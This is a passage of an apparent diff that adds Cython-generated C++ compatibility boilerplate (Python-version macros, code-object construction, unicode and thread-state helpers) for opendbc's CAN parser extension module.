CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__opendbc__can__parser_pyx +#define __PYX_HAVE_API__opendbc__can__parser_pyx +/* Early includes */ +#include +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include + + #if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + // move should be defined for these versions of MSVC, but __cplusplus isn't set usefully + #include + + namespace cython_std { + template typename std::remove_reference::type&& move(T& t) noexcept { return std::move(t); } + template typename std::remove_reference::type&& move(T&& t) noexcept { return std::move(t); } + } + + #endif + +#include +#include +#include +#include "common_dbc.h" +#include "common.h" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define 